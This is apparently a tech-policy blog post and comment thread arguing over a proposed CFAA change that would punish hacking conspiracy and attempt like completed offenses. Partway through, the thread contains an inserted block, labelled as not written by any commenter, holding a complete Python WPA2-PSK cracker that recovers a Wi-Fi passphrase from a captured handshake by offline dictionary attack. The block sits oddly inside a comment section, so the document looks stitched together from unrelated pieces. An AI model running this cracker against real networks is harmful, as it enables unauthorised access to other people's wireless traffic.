Senator Leahy Tries To Sneak Through Plans To Make Merely Talking About Computer Hacking A Serious Crime

from the that's-not-good dept

You may have heard about the recent high-profile, malicious hack of Target's point of sale systems, which gave the attackers access to the details of at least 40 million credit cards. Senator Patrick Leahy is, incredibly cynically, using this news event to try to sneak through a change to the "anti-hacking" law, the CFAA, which was used to prosecute Aaron Swartz and many others. And it's not a change that improves the law; it broadens it, massively extending how the DOJ can charge just about anyone it wants with serious computer crimes. This is monumentally bad, and Senator Leahy is trying to hide it behind a major news event because he knows he couldn't get this kind of DOJ wishlist through on its own.

Officially, this is Leahy reintroducing his Personal Data Privacy and Security Act, a bill he has tried to introduce a number of times before. The crux of that bill makes some sense: requiring companies that have had a security breach to inform those who were affected. State laws (most notably California's) already include similar requirements, but this is an attempt to create a federal law on that front. There are some reasonable concerns about such a law, but the general idea of better protecting the public from data breaches, by at least letting them know about them, is worth considering.

The problem is that Leahy has inserted a couple of other dangerous bits and pieces into the bill, including a couple of "reforms" to the parts of the CFAA that have raised significant concerns, and buried them deep within it. Section 105 of the bill, for example, simply repeats the change that the House Judiciary Committee tried to include last year in its attempt at bad CFAA reform. It's basically part of the DOJ's wishlist: changing the CFAA so that someone who merely "conspires to commit or attempts to commit" the offense is treated the same as someone who actually commits it. It may be difficult to spot if you just read the proposed bill (this is on purpose), because all the bill does is insert the phrase "for the completed offense," so that the CFAA's conspiracy provision would read:

Whoever conspires to commit or attempts to commit an offense under subsection (a) of this section shall be punished as provided for the completed offense in subsection (c) of this section.

Current law does not include those four words. Why is that a big change? As we explained last year:

All they did was add the "for the completed offense," to that sentence. That may seem like a minor change at first, but it would now mean that they can claim that anyone who talked about doing something ("conspires to commit") that violates the CFAA shall now be punished the same as if they had "completed" the offense. And, considering just how broad the CFAA is, think about how ridiculous that might become.

While the proposed bill does include a further change clarifying that merely violating a terms of service agreement does not, by itself, make you subject to the CFAA, the TOS issue is not the only thing that concerns so many people about the CFAA.

The CFAA needs to be greatly scaled back, not expanded, no matter what the DOJ wants. It's ridiculous that Senator Leahy is not only proposing this, but trying to hide it in a bill about security breach reporting, tied to a news event.

This is insane. This would make something as simple as reading the JavaScript on a page that has to do with login or auth, or using a tool like Fiddler to look at your own web traffic, potentially illegal actions. Not to mention completely killing white and grey hat security research. That's awesome; this is like taking all the guns away from law-abiding folks: only the black hats will be able to research security holes and thus have the guns to exploit them.

What a monumentally stupid idea introduced by a monumentally stupid Luddite.

So if Joe User is clicking around on his banking website one day and discovers - inadvertently or otherwise - a security hole big enough to drive a truck through, just pointing that security hole out to the bank will be a criminal offense on par with actually exploiting it. I mean, obviously that's already happening in many cases, but to have such insanity codified into law means that there is no incentive whatsoever to inform the bank of the flaw.

Not really

> but it would now mean that they can claim that anyone who talked about doing something ("conspires to commit") that violates the CFAA shall now be punished the same as if they had "completed" the offense

That's a bit misleading. Merely talking about something isn't the same as conspiring to do it. First of all, a conspiracy requires two or more people, so someone merely writing a blog post about computer hacking, for example, wouldn't qualify. Second, conspiracy requires an "overt act in furtherance of the conspiracy" in order for it to be complete and prosecutable, so not only do you have to plan to commit the crime with other people, you also have to take an affirmative step toward implementing that plan. It's not merely "talking about it" as the article states.

Re:

All "conspiracy to commit" laws are questionable

All such laws are highly questionable, and I strongly oppose any effort to add to them.

For a real-world example from a number of years ago, it's a felony to get together with a few friends and plan a bank robbery -- even if we have no intention whatsoever of actually committing the robbery. The people who did this not only didn't commit a robbery, they very clearly engaged in the planning purely as an intellectual exercise.

This seems to be blatantly unconstitutional on free speech grounds alone.

I could (grudgingly) get behind "conspiracy to commit" charges as add-ons to a real crime that was actually committed, much like the hate speech laws, but that's as far as it should go.

what IS NOT SAID.

For a few reasons, Target does not say HOW (wireless, networked, Internet, ???) their system was taken advantage of. THIS is important, and could tell us if Target was an IDIOT.

If they had a fairly protected system, it would mean this is an INSIDE job. If they were like Home Depot (wireless system) (STUPID) then they needed better protection than they HAD. If they allowed DIRECT access from an internet connection, then they are even more stupid.

Encryption is OK, but giving anyone direct access to the file ITSELF? Means only a few people should have access.

For those that don't get it, let's say you REALLY want to protect a file.

1) You can make it NOT listed in the files (invisible).
2) You have to know the NAME of the file, as you can't see it.
3) Password the file, NOT too hard, and it can be built into the EDITING program that WORKS with the file.
4) Separate files: name file, data files can be 2-3-4-5 parts, and if you get 1, you don't get the others.

Re: Not really

First of all, a conspiracy requires two or more people, so someone merely writing a blog post about computer hacking, for example, wouldn't qualify

Are you sure? A blog post involves two people as soon as someone reads it. Commenting provides interaction, if that's a requirement.

conspiracy requires an "overt act in furtherance of the conspiracy" in order for it to be complete

Yes, but that's an incredibly low bar that is easily satisfied in most completely innocent circumstances. In the bank robbery planning incident I described in another comment here, that condition was satisfied by the fact that the "conspirators" had obtained the building plans for the bank.

If, as often happens in my workplace (a software security company), two developers are discussing how a particular exploit works then example code will certainly be exchanged, and probably written. That would probably satisfy the requirement as well.

Re: Re:

By telling the bank "I could easily steal millions of dollars from you, so could anyone else. You've got this big security flaw on your website that anyone can exploit, please fix it before someone victimizes you. [insert description of flaw]"

You've spoken about breaking into a website and stealing money from it. That's now a crime.

Re:

It kinda does. If you leave your door open, and a thief walks in and steals things, IS HE breaking and entering? He may have entered, but you left it open. IS it hacking if they DON'T protect themselves??

AS WELL, the word "hacking" isn't used properly. DID they hack anything? If it was an ADMIN, it wasn't a HACK.

Re: Re: Re: Re:

"Whoever conspires to commit or attempts to commit an offense under subsection (a) of this section shall be punished as provided for the completed offense in subsection (c) of this section. "

If one is looking for security vulnerabilities, that is attempting. If I find one by accident and report it that could easily be twisted into a conspiracy. "Your Honor this man wanted to embarrass the bank so he conspired to find security issues"

Re: Re: Re: Re:

"The bill also includes the Obama administration's proposal to update the Computer Fraud and Abuse Act, so that attempted computer hacking and conspiracy to commit computer hacking offenses are subject to the same criminal penalties, as the underlying offenses." -- Quote from the letter

What that means is that informing them of the flaw could very well mean that the bank could accuse you of hacking. I.E. GeoHot was accused of hacking his Playstation 3, that he even bloody well owned, by Sony under CFAA.

Re: Re:

As others have said, the legal definition of "conspiring" is broad enough to encompass simply talking about an act, despite your apparent belief to the contrary. In addition, the fact that people are already being prosecuted for this very thing* makes me think that specifically beefing up that part of the Act is intending exactly this.

*If you don't know what cases I'm talking about here you're not informed enough to even argue the point.

Re: what IS NOT SAID.

"(wireless system)(STUPID)"

What makes wireless stupid? Data is transmitted from point A to point B. It is the job of point A and point B to:

1. Validate they are communicating with the real endpoint
2. Encrypt their communications to prevent eavesdropping

If the communicating parties are doing those two things then it does not matter if you are using wired, wireless, snail mail, smoke signals or whatever.

Fail at either of those things and you are vulnerable on a wired or wireless network.

It's basically part of the DOJ's wishlist, changing the CFAA to make you guilty of violating the law if you merely "conspire or attempt to commit" the offense, rather than if you actually do commit the offense.

It's about time to change the name of the DOJ to DOI. Since Eric the Nazi took over as AG, the DOJ has been acting more like the Department of Injustice than the former.

"Whoever conspires to commit an offense shall be punished as provided for the completed offense"

Consider committing a crime, be punished as if you'd actually done the crime. Just when you didn't think America could get any more dystopian, the Senate is now voting on whether to start having people arrested for thoughtcrime.

Re: Not really

I don't know if it changes the definition of the crime. The problem is that the punishment for the more active forms of intent is now exactly the same as for actually hacking. It is a sad society to live in if the punishment for conspiracy to commit murder is the same as for first-degree murder...

About the overt act, it seems that it can be ignored as a requirement in some cases like drug enforcement.

From the SCOTUS judgement in US v. Shabani: The Court ruled: "...Congress intended to adopt the common law definition of conspiracy, which does not make the doing of any act other than the act of conspiring a condition of liability..."

Re: Re: Re: Re: Re: Re:

Security researchers do not operate in their own little bubble. If you find an exploitable weakness and discuss it with other researchers or knowledgeable people, and then later on do something to attract the DoJ's attention, their history would indicate your discussions could quite easily be turned into 'conspiring' in order to threaten you with serious charges.

Remember, we're not talking about common-sense interpretations here, but about how the laws can be and have been twisted by the DoJ for their own purposes, like making heavy-handed threats as part of a plea bargain.

Re: Re: Re: Not really

You don't necessarily need to be found guilty of such an act of conspiracy; you merely have to be threatened with these serious charges in order to be made to take a plea deal. Techdirt and others have covered this tactic quite extensively. A law like this would give the DoJ the ability to make even scarier threats, and increase the chances of innocent people pleading guilty to a lesser offence to avoid the possibility, however unlikely, of being found guilty of a much more serious crime.

Re:

I'm guilty then. I use GreaseMonkey. Therefore I'm guilty of violating this on my home PC. Of course, then he would be guilty as well. "Hey, you have a trojan on your gov't issued laptop!" Oops, forgot. You work for the gubbermint. You're innocent.

Re: Re: Not really

> The Court ruled: "...Congress intended to adopt the common law definition of conspiracy, which does not make the doing of any act other than the act of conspiring a condition of liability..."

That is asinine and flies in the face of reality. The federal conspiracy statute (18 USC 371) reads:

If two or more persons conspire either to commit any offense against the United States, or to defraud the United States, or any agency thereof in any manner or for any purpose, and one or more of such persons do any act to effect the object of the conspiracy, each shall be fined under this title or imprisoned not more than five years, or both.

Since the statute ACTUALLY SAYS that an overt act is required, it beggars the imagination how the Court can claim that Congress didn't intend to include that in the law.

This is just another example of the Court making shit up based on its own agenda and claiming words don't mean what they say, or mean the opposite of what they say, or whatever it takes to justify the result the Court wants, rather than what the law requires.

Conspiracy

> Consider committing a crime, be punished as if you'd actually done the crime. Just when you didn't think America could get any more dystopian, the Senate is now voting on whether to start having people arrested for thoughtcrime.

So many people in this thread are acting like this is something new. The conspiracy offense has been a part of federal law for a century or more. Just because it's now being applied to computer/tech offenses doesn't make it some novel attempt to create a dystopian nightmare.

Re:

But do you have the funds to fight it if someone decides to use the law in that manner?

The laws in the US have 2 faces now. One that is easy for the average person to see and understand, and another distorted face that serves a purpose that the people who wrote the law really wanted in their toolbelt.

You know what I find insanely stupid in all this? There is no requirement that if the federal government gets hacked they have to tell anyone anything. Nor if you look does it include the federal government in this bill. This bill is about states.

Given the reports about ACA (Obamacare) having never been built with security in mind, this becomes seriously important. In order to sell ACA this particular topic has been sidelined into silence. And what about the NSA gathering up all this data and then turning it over to other agencies with the admonishment they can't be used as the source? Given their tools, that is hacking; dishing out malware at targeted computers/individuals.

Senator Leahy once again shows his real colors in all this. It's about covering the government's ass, not about security. When you can't find another charge, claim conspiracy to hack as a catch-all for anything dealing with computers. This makes me very uneasy. I use element Q to get rid of annoying javascript and other undesirable items on web pages I view. It does nothing to the original site, as all changes are temporary and on my computer only. Removing blocks that prevent viewing the public site until you activate javascript doesn't float. Yet it is likely that under prosecutorial expansion it could one day be illegal with this vague law.

Re: Re: Re:

Jackn, you have no clue what you're talking about. Reading this comment and the ones before makes it quite clear that you don't know anything about security or computers.

You can password protect individual files and have the editing software support the encryption. Adobe Acrobat does that, Microsoft Office does that, good database software can do that. Hell, Windows (pro and up) itself supports that.

Re: Re:

The laws in the US have 2 faces now. One that is easy for the average person to see and understand, and another distorted face that serves a purpose that the people who wrote the law really wanted in their toolbelt.

Sen. Leahy is also the one introducing the USA FREEDOM Act, in order to scale back unconstitutional spying. Yet, he introduces dangerous changes to the CFAA that allows people to be charged with a crime they have yet to commit.

This just goes to show you can never trust a politician, because the vast majority of them are two-faced deceivers. The most "transparent" administration ever, the Obama administration, is proof of how two-faced politicians are.

Re: Conspiracy

There's some truth to this. It's like in Men In Black, where Agent J was shocked to learn that a spaceship was getting ready to destroy Earth, and Agent K told him that there's ALWAYS something out there preparing to destroy Earth.

But that doesn't mean you shouldn't get angry and mobilize when you happen to hear about these things, or even stop talking about what could happen if you don't remind the government who's actually supposed to be running this country.

Re: Re: Re: Re:

I think you're misunderstanding what he's saying.

You don't need to agree with the conclusion he draws but if you don't even know the cases generally used as relevant legal precedent in these situations then you're not informed enough to argue legal matters.

Re:

"Yet, he introduces dangerous changes to the CFAA that allows people to be charged with a crime they have yet to commit."

Actually, conspiracy to commit a crime is often a crime in and of itself. It's why you can arrest someone for hiring a hitman before the target gets killed, because it's a conspiracy to commit murder (I know, a big example, but there ya go).

Conspiring with others to hack into a network to obtain material illegally should be a crime. It wouldn't harm white hat hackers trying to show a problem, but it would sure screw up black hatters planning their next break in.

Re: Re: Re: Re: Re:

Dear Jack.. Giving wireless access or internet access to ROOT, BASE commands is a REAL sec. threat. Giving full control to any remote access should be forbidden. How stupid do these people seem.

Any commercial business wishes to see every transaction and action done in the store. It's the only way to protect themselves, and see WHO DID WHAT, and WHOM to blame. If they did even BASIC security and tricks, the ONLY way to have full access to this file is to KNOW the name of it and have the password to open it. That's why information is important: HOW did they get the files? IF they had basic sec., then it had to be someone with access.

ALSO, there are many ways to hide files. One uses control characters in the name, which will list in the DIR, but the name is blank. It erases itself, and unless you have a HEX dump of the DIR you will NEVER see the name. The OLD ways still work. How do you think we hacked in the OLD days? HEX editors RULE..

Mike, you seem to be misunderstanding what the bill says, or what current law says. Or both. Those words don't change what acts are criminal at all. They don't make things into crimes that aren't criminal as the law now stands. They just change the maximum possible punishment, from 5 years (the punishment for conspiracy) to 5 or 10 or 15 years or more under the CFAA. I'm sure you think that's a bad idea too, but it is a completely different bad idea from the one your post seems to have invented based on some misreading of the statute.

Re: Not really

I am afraid they have the legal precedent for making merely talking about something, without doing it, illegal. When Hal Turner was prosecuted for "threatening" federal judges, it should be noted that he did not say he was going to kill those judges, nor did he tell anyone to. He just merely offered an opinion.

Under this CFAA change, saying that someone deserves to have their computer hacked, without actually doing it, or telling someone to do it, would also be a criminal offence.

The way I see this, this could put ISPs in a damned-if-you-do, damned-if-you-don't situation once TPP is implemented. They could be in violation of the CFAA if they do monitor users for copyright violations, and in violation of copyright laws if they don't.

Between this and TPP, it could force nearly every internet company out of business, if you cannot obey the laws that will result from TPP, without violating the CFAA.

The way this law is written, half the student body where I went to community college in the late 1980s would have been felons, if this had been law then, because of a few things we did to circumvent disk quotas.

Courtroom Hilarity

So wouldn't that mean that under that utterly idiotic law it is ironically nearly impossible to convict someone for hacking? I mean in order to prosecute you they'd need to talk about computer hacking. Therefore you can attempt to have the prosecutor prosecuted for violating the law when he attempts to prosecute you.

Re:

If simply discussing hacking is the same as actually doing it, then the DOJ would be unable to hold briefings or meetings internally to discuss hacking countermeasures without running afoul of the law...not that they'd ever hold themselves to the standards they apply to everyone else.

Conspiracy means.....

Though I am totally against anything that would tend to restrict our freedoms in any way more than they have already been post-9/11, I have to question the interpretation of this law. Leahy has always been a strong advocate of personal rights and his insidious planning as limned here is something that would be completely out of character, if it were true. But the word "conspiracy" makes it all quite different from the knee-jerk interpretation. Talking about or discussing something is not conspiracy. Even discussing ways of circumventing security without the intention of actually doing it is not conspiracy, either. Conspiracy has always been a difficult thing to prove in court, as it should be, and I have no doubt, will continue to be.

Re:

Who didn't vote for the Patriot Act? If you remember the time well, you would most likely have accused him of treason if he had not voted for it at the time. Everyone was gung-ho, and even then I had the feeling that it was too much, too fast.

Re: Conspiracy

Agreed. It is an effort to have the tools to actually prevent the breaches before they happen instead of just trying to clean up the mess afterward. "Conspiracy" is always difficult to prove and involves a lot more than just "talking about" the security in question.

Re: Re: what IS NOT SAID.

Wireless in general is not stupid, however it presents security problems that are not solved if you just use off-the-shelf consumer equipment without adding additional precautions (such as a VPN).

Wireless broadcasts all of your communications over radio, where it is easily listened to by anybody within range. Also, it's like placing a network port on the outside of your house -- anyone can plug into it.

The built-in, standard security measures (WPA) are insufficient against anybody of more skill than a script kiddie (and, these days not even against them).

It's not stupid to use such equipment. It is naive and dangerous to use such equipment while believing that it is secure, unless you've taken additional steps to harden everything.
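The two replies above (the "validate the real endpoint, encrypt the traffic" comment and this one on WPA being insufficient) can be made concrete. The following is an added example, not code from the article or any commenter: it implements the WPA2-PSK key schedule as specified in IEEE 802.11i (PBKDF2-HMAC-SHA1 of the passphrase and SSID for the PMK, the 802.11i PRF for the PTK, and HMAC-SHA1 truncated to 16 bytes for the EAPOL-Key MIC), then runs the offline dictionary attack a passive listener can mount after capturing one 4-way handshake. The MIC in handshake message 2 is how each side proves it holds the same PMK (the "endpoint validation" step), and the PTK derived alongside it keys the encryption; both collapse to the strength of the passphrase. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed for the demo, and the EAPOL frame is a simplified stand-in with the MIC field already zeroed, as an attacker would prepare it.

```python
import hashlib
import hmac
from typing import Dict, Iterable, Optional

# --- WPA2-PSK key schedule (IEEE 802.11i) ---

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... and truncate."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP) = PRF(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    Byte layout: KCK = PTK[0:16] (MIC key), KEK = PTK[16:32], TK = PTK[32:48] (data encryption key)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2/CCMP EAPOL-Key MIC: HMAC-SHA1 over the frame (MIC field zeroed), truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# --- Constructed "capture": everything below is what a passive radio listener sees ---
SSID = "CoffeeShopPOS"                                   # hypothetical network name
AP_MAC = bytes.fromhex("001122334455")                   # hypothetical access point address
STA_MAC = bytes.fromhex("66778899aabb")                  # hypothetical client address
ANONCE = hashlib.sha256(b"anonce-demo").digest()         # 32-byte nonces, fixed so the demo is deterministic
SNONCE = hashlib.sha256(b"snonce-demo").digest()
# Simplified stand-in for handshake message 2 (client -> AP) with the 16-byte MIC field zeroed.
EAPOL_MSG2 = (b"\x01\x03\x00\x75" + b"\x02\x01\x0a" + bytes(8) + SNONCE
              + bytes(16 + 8 + 8 + 8) + bytes(16) + b"\x00\x00")

_REAL_PASSPHRASE = "password123"   # the weak passphrase the hypothetical network actually uses
CAPTURED_MIC = eapol_mic(
    ptk_from_pmk(pmk_from_passphrase(_REAL_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16],
    EAPOL_MSG2,
)
CAPTURE: Dict[str, bytes] = {
    "ssid": SSID.encode(), "ap_mac": AP_MAC, "sta_mac": STA_MAC,
    "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_MSG2, "mic": CAPTURED_MIC,
}


def crack_wpa2_psk(wordlist: Iterable[str], capture: Dict[str, bytes]) -> Optional[str]:
    """Offline dictionary attack: derive KCK for each candidate and compare the recomputed MIC
    against the captured one. Returns the passphrase on a match, None otherwise."""
    ssid = capture["ssid"].decode()
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    wordlist = ["letmein", "hunter2", "password123", "correcthorse"]   # constructed wordlist
    print("recovered passphrase:", crack_wpa2_psk(wordlist, CAPTURE))
```

Nothing here touches the access point after the capture: every guess costs the attacker one PBKDF2 run (4096 SHA-1 rounds) and a handful of HMACs, entirely offline. That is why the medium (wired or wireless) matters less than the two properties the earlier comment names, and why a PSK network is only as strong as its passphrase against anyone who can hear one handshake.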

Re: Re: Re: Not really

This is one definition from one section of one law. "Conspiracy" does not have a monolithic definition. And as far as the overt act goes, simply buying a notebook at a dollar store to keep track of the plan is an act toward effecting the object of the conspiracy, so it neither adds nor subtracts substantially from the original view.

Re: Re: Re: Re:

I possess programs that will crack the password locks on zip files, PDF files, Office files, and more in less than a second. Relying on those mechanisms to protect your data is as useful as locking your screen door.

Re: Conspiracy

Just because it's now being applied to computer/tech offenses doesn't make it some novel attempt to create a dystopian nightmare.

You're right, conspiracy laws are nothing new. However, the CFAA is already a dystopian nightmare. I think the reaction is that adding the ability to bring conspiracy charges on top of it will just make everything that much worse.

Re: what IS NOT SAID.

Only a few people should have access to the file? What use would the file have if no one could use it for sales, the reason it exists in the first place? EVERYONE needs access to the file by some method. When you lock people out too tightly, you also lock yourself in.

And as far as wired/wireless, it makes no difference whatever. It's surprising that you actually think that it would. But then your suggested methods of supposedly hiding files are all well-known, sophomoric, and as easy to get around as turnstiles are to jump over. You really need better security than something a 4th-grader could come up with.

Re: Re: Re: Re: Re:

I wonder how Target stored their detailed transaction data. Probably PDF or Excel. I think that could handle 70 million records. Indexing is probably really slow though. Maybe they store their transaction data in a zipped PDF. No wonder it takes so long for a credit card purchase to go through!

You guys are eye openers. Here I am in my CISSP world making things really difficult when all we need is a hex editor. I wonder if the PCI specs recognize these methods as appropriate?

Re: Re: Re: Re: Re: Re:

PDF? Excel? Are you kidding me? I think I'm getting dizzy. And the DMV, too? And do you think that retrieving that data requires a search or something and that is why you mention the time?

There is a thing called a "database". It is often huge. Like the Windows registry. Access is immediate and direct to each piece of data: no search, no following some path to get to it, no change in access time regardless of size. Databases have been around quite a long time.

Re: Re: Not really

When you said:

"If, as often happens in my workplace (a software security company), two developers are discussing how a particular exploit works then example code will certainly be exchanged, and probably written. That would probably satisfy the requirement as well."

No. It does not satisfy that requirement. People discussing something in the workplace related to their legal employment would not qualify as conspirators to an illegal activity.

Re: Re: Re:

No. Telling the bank you could steal is not a crime.

The whole point of Leahy's proposal is that crimes committed over the Internet are often carried out by organized groups of individuals. Each individual is contributing to the crime. When caught, some individuals are able to make the case that even though their actions contributed to or facilitated the crime, they did not commit the charged top act.

For example someone could claim "I broke a window.". Another person climbed through that window and robbed the premises. Both parties contributed to the crime.

Re: Re: Re: Re: Re: Re:

Target, like anybody else that has a huge database they need to access quickly, stores their data in a DBMS, such as Access, MySQL, etc. Anything else wouldn't be searchable in a useful way, would take forever to do transactions on, and couldn't be used by thousands of users simultaneously.

Re: Re:

No, not everyone was gung-ho at the time. The Patriot Act was incredibly unpopular in my circles. Not everyone lost their minds.

I thought that every single person who voted for it then (and the renewals since then) shouldn't be trusted to be in government due to either extremely poor judgement or too much of a totalitarian bent.

Re: Conspiracy means.....

The problem is the nexus with the CFAA, which is infamous for being interpreted way beyond reason to imprison people who, at worst, engaged in misdemeanor offenses. Bringing conspiracy into that mix is a pretty clear indicator that "conspiracy" will be used in an overly-broad fashion as well.

Re: Re:

The conspiracy to hack already was a crime, but that's not the problem. The problem is that with the 4 words added to the law, the conspiracy to hack would be treated the same as if you had actually committed the crime.